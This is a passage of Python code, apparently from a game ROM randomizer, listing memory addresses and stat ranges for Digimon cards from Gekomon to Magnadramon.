max_value=Max_Cross_Multiplier(170,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross Effect",
addresses=[0x2667d94],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gekomon 053
Attribute(
name="Gekomon Element",
addresses=[0x2667e06],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 53),
max_value=Get_Element_Type(16, 2, 53),
is_little_endian=True, ),
Attribute(
name="Gekomon +DP",
addresses=[0x2667e08],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gekomon HP",
addresses=[0x2667e0a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(960,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(960,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Circle",
addresses=[0x2667e0c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Triangle",
addresses=[0x2667e28],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Cross",
addresses=[0x2667e44],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gekomon Cross Effect",
addresses=[0x2667ed0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Coelamon 054
Attribute(
name="Coelamon Element",
addresses=[0x2667f42],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 54),
max_value=Get_Element_Type(16, 2, 54),
is_little_endian=True, ),
Attribute(
name="Coelamon +DP",
addresses=[0x2667f44],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Coelamon HP",
addresses=[0x2667f46],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1270,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1270,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Circle",
addresses=[0x2667f48],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Triangle",
addresses=[0x2667f64],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Cross",
addresses=[0x2667f80],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(210,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Coelamon Cross Effect",
addresses=[0x266800c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Mojyamon 055
Attribute(
name="Mojyamon Element",
addresses=[0x266807e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 55),
max_value=Get_Element_Type(16, 2, 55),
is_little_endian=True, ),
Attribute(
name="Mojyamon +DP",
addresses=[0x2668080],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Mojyamon HP",
addresses=[0x2668082],
number_of_bytes=2,
min_value=Min_HP_Multiplier(980,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(980,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Circle",
addresses=[0x2668084],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Triangle",
addresses=[0x26680a0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Cross",
addresses=[0x26680bc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,ice_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(210,ice_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Mojyamon Cross Effect",
addresses=[0x2668148],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Shellmon 056
Attribute(
name="Shellmon Element",
addresses=[0x26681ba],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 56),
max_value=Get_Element_Type(16, 2, 56),
is_little_endian=True, ),
Attribute(
name="Shellmon +DP",
addresses=[0x26681bc],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Shellmon HP",
addresses=[0x26681be],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1250,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Circle",
addresses=[0x26681c0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Triangle",
addresses=[0x26681dc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Cross",
addresses=[0x26681f8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Shellmon Cross Effect",
addresses=[0x2668284],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Sorcerimon 057
Attribute(
name="Sorcerimon Element",
addresses=[0x26682f6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 57),
max_value=Get_Element_Type(16, 2, 57),
is_little_endian=True, ),
Attribute(
name="Sorcerimon +DP",
addresses=[0x26682f8],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Sorcerimon HP",
addresses=[0x26682fa],
number_of_bytes=2,
min_value=Min_HP_Multiplier(900,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(900,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Circle",
addresses=[0x26682fc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(440,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(440,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Triangle",
addresses=[0x2668318],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Cross",
addresses=[0x2668334],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,champion_modifier,10),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,champion_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Sorcerimon Cross Effect",
addresses=[0x26683c0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#IceDevimon 058
Attribute(
name="IceDevimon Element",
addresses=[0x2668432],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 58),
max_value=Get_Element_Type(16, 2, 58),
is_little_endian=True, ),
Attribute(
name="IceDevimon +DP",
addresses=[0x2668434],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="IceDevimon HP",
addresses=[0x2668436],
number_of_bytes=2,
min_value=Min_HP_Multiplier(990,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(990,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Circle",
addresses=[0x2668438],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Triangle",
addresses=[0x2668454],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Cross",
addresses=[0x2668470],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(180,ice_special_modifier,champion_modifier,11),
max_value=Max_Cross_Multiplier(180,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="IceDevimon Cross Effect",
addresses=[0x266862C],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Hyogamon 059
Attribute(
name="Hyogamon Element",
addresses=[0x266869E],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 59),
max_value=Get_Element_Type(16, 2, 59),
is_little_endian=True, ),
Attribute(
name="Hyogamon +DP",
addresses=[0x26686a0],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Hyogamon HP",
addresses=[0x26686a2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Circle",
addresses=[0x26686a4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(460,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(460,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Triangle",
addresses=[0x26686c0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Cross",
addresses=[0x26686dc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Hyogamon Cross Effect",
addresses=[0x2668768],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Icemon 060
Attribute(
name="Icemon Element",
addresses=[0x26687da],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 60),
max_value=Get_Element_Type(16, 2, 60),
is_little_endian=True, ),
Attribute(
name="Icemon +DP",
addresses=[0x26687dc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Icemon HP",
addresses=[0x26687de],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1140,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1140,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Circle",
addresses=[0x26687e0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(370,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Triangle",
addresses=[0x26687fc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(240,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(240,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Cross",
addresses=[0x2668818],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,7),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Icemon Cross Effect",
addresses=[0x26688a4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gomamon 061
Attribute(
name="Gomamon Element",
addresses=[0x2668916],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 61),
max_value=Get_Element_Type(16, 0, 61),
is_little_endian=True, ),
Attribute(
name="Gomamon +DP",
addresses=[0x2668918],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gomamon HP",
addresses=[0x266891a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(700,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(700,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Circle",
addresses=[0x266891c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Triangle",
addresses=[0x2668938],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(240,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(240,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Cross",
addresses=[0x2668954],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,rookie_modifier,3),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,rookie_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gomamon Cross Effect",
addresses=[0x26689e0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gabumon 062
Attribute(
name="Gabumon Element",
addresses=[0x2668a52],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 62),
max_value=Get_Element_Type(16, 0, 62),
is_little_endian=True, ),
Attribute(
name="Gabumon +DP",
addresses=[0x2668a54],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gabumon HP",
addresses=[0x2668a56],
number_of_bytes=2,
min_value=Min_HP_Multiplier(680,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(680,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Circle",
addresses=[0x2668a58],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Triangle",
addresses=[0x2668a74],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Cross",
addresses=[0x2668a90],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(140,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(140,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gabumon Cross Effect",
addresses=[0x2668b1c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Betamon 063
Attribute(
name="Betamon Element",
addresses=[0x2668b8e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 63),
max_value=Get_Element_Type(16, 0, 63),
is_little_endian=True, ),
Attribute(
name="Betamon +DP",
addresses=[0x2668b90],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Betamon HP",
addresses=[0x2668b92],
number_of_bytes=2,
min_value=Min_HP_Multiplier(730,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(730,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Circle",
addresses=[0x2668b94],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(300,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Triangle",
addresses=[0x2668bb0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(190,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(190,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Cross",
addresses=[0x2668bcc],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Betamon Cross Effect",
addresses=[0x2668c58],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Penguinmon 064
Attribute(
name="Penguinmon Element",
addresses=[0x2668cca],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 64),
max_value=Get_Element_Type(16, 0, 64),
is_little_endian=True, ),
Attribute(
name="Penguinmon +DP",
addresses=[0x2668ccc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Penguinmon HP",
addresses=[0x2668cce],
number_of_bytes=2,
min_value=Min_HP_Multiplier(670,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(670,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Circle",
addresses=[0x2668cd0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(320,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(320,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Triangle",
addresses=[0x2668cec],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(180,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(180,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Cross",
addresses=[0x2668d08],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(170,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Penguinmon Cross Effect",
addresses=[0x2668d94],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gizamon 065
Attribute(
name="Gizamon Element",
addresses=[0x2668f36],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 65),
max_value=Get_Element_Type(16, 0, 65),
is_little_endian=True, ),
Attribute(
name="Gizamon +DP",
addresses=[0x2668f38],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Gizamon HP",
addresses=[0x2668f3a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(650,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(650,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Circle",
addresses=[0x2668f3c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(260,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(260,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2668f58],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Cross",
addresses=[0x2668f74],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,rookie_modifier,11),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,rookie_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gizamon Cross Effect",
addresses=[0x2669000],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Otamamon 066
Attribute(
name="Otamamon Element",
addresses=[0x2669072],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 66),
max_value=Get_Element_Type(16, 0, 66),
is_little_endian=True, ),
Attribute(
name="Otamamon +DP",
addresses=[0x2669074],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Otamamon HP",
addresses=[0x2669076],
number_of_bytes=2,
min_value=Min_HP_Multiplier(710,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(710,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Circle",
addresses=[0x2669078],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(330,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(330,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Triangle",
addresses=[0x2669094],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(130,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(130,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Cross",
addresses=[0x26690b0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,rookie_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,rookie_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Otamamon Cross Effect",
addresses=[0x266913c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#SnowAgumon 067
Attribute(
name="SnowAgumon Element",
addresses=[0x26691ae],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 67),
max_value=Get_Element_Type(16, 0, 67),
is_little_endian=True, ),
Attribute(
name="SnowAgumon +DP",
addresses=[0x26691b0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="SnowAgumon HP",
addresses=[0x26691b2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(720,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(720,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Circle",
addresses=[0x26691b4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(160,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(160,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Triangle",
addresses=[0x26691d0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Cross",
addresses=[0x26691ec],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(220,ice_special_modifier,rookie_modifier,4),
max_value=Max_Cross_Multiplier(220,ice_special_modifier,rookie_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowAgumon Cross Effect",
addresses=[0x2669278],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#SnowGoburimon 068
Attribute(
name="SnowGoburimon Element",
addresses=[0x26692ea],
number_of_bytes=1,
min_value=Get_Element_Type(16, 0, 68),
max_value=Get_Element_Type(16, 0, 68),
is_little_endian=True, ),
Attribute(
name="SnowGoburimon +DP",
addresses=[0x26692ec],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="SnowGoburimon HP",
addresses=[0x26692ee],
number_of_bytes=2,
min_value=Min_HP_Multiplier(770,ice_special_modifier,rookie_modifier),
max_value=Max_HP_Multiplier(770,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Circle",
addresses=[0x26692f0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(230,ice_special_modifier,rookie_modifier),
max_value=Max_Circle_Multiplier(230,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Triangle",
addresses=[0x266930c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(230,ice_special_modifier,rookie_modifier),
max_value=Max_Triangle_Multiplier(230,ice_special_modifier,rookie_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Cross",
addresses=[0x2669328],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(230,ice_special_modifier,rookie_modifier,0),
max_value=Max_Cross_Multiplier(230,ice_special_modifier,rookie_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="SnowGoburimon Cross Effect",
addresses=[0x26693b4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Valkyrimon 069
Attribute(
name="Valkyrimon Element",
addresses=[0x2669426],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 69),
max_value=Get_Element_Type(32, 3, 69),
is_little_endian=True, ),
Attribute(
name="Valkyrimon +DP",
addresses=[0x2669428],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Valkyrimon HP",
addresses=[0x266942a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1590,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1590,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Circle",
addresses=[0x266942c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(840,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(840,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Triangle",
addresses=[0x2669448],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(550,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Cross",
addresses=[0x2669464],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(350,nature_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(350,nature_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Valkyrimon Cross Effect",
addresses=[0x26694f0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Seraphimon 070
Attribute(
name="Seraphimon Element",
addresses=[0x2669562],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 70),
max_value=Get_Element_Type(32, 3, 70),
is_little_endian=True, ),
Attribute(
name="Seraphimon +DP",
addresses=[0x2669564],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Seraphimon HP",
addresses=[0x2669566],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1650,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1650,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Circle",
addresses=[0x2669568],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(900,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(900,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Triangle",
addresses=[0x2669584],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(510,nature_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(510,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x26695a0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(420,nature_special_modifier,ultimate_modifier,14),
max_value=Max_Cross_Multiplier(420,nature_special_modifier,ultimate_modifier,14),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seraphimon Cross Effect",
addresses=[0x266962c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Magnadramon 071
Attribute(
name="Magnadramon Element",
addresses=[0x266969e],
number_of_bytes=1,
min_value=Get_Element_Type(32, 3, 71),
max_value=Get_Element_Type(32, 3, 71),
is_little_endian=True, ),
Attribute(
name="Magnadramon +DP",
addresses=[0x26696a0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Magnadramon HP",
addresses=[0x26696a2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1870,nature_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1870,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Circle",
addresses=[0x26696a4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(800,nature_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(800,nature_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Magnadramon Triangle",
addresses=[0x26696c0],
